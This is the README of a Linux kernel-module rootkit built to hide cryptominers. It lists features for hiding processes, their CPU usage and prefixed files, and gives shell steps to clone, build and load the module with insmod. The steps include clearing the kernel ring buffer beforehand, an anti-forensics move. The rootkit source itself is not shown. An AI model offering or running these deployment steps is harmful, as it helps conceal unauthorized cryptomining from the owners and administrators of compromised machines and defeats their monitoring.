Notice: This LKM rootkit is unmaintained. Please use Diamorphine as an alternative.
Related post: https://alfon.xyz/posts/hiding-cryptominers-linux
- Hide process
- Hide process CPU usage
- Hide files that his filename starts with the MAGIC_PREFIX
$ git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
$ cd hiding-cryptominers-linux-rootkit/
$ make
$ dmesg -C # clears all messages from the kernel ring buffer
$ insmod rootkit.ko
$ dmesg # verify that rootkit has been loaded
$ rmmod rootkit
$ dmesg # verify that rootkit has been unloaded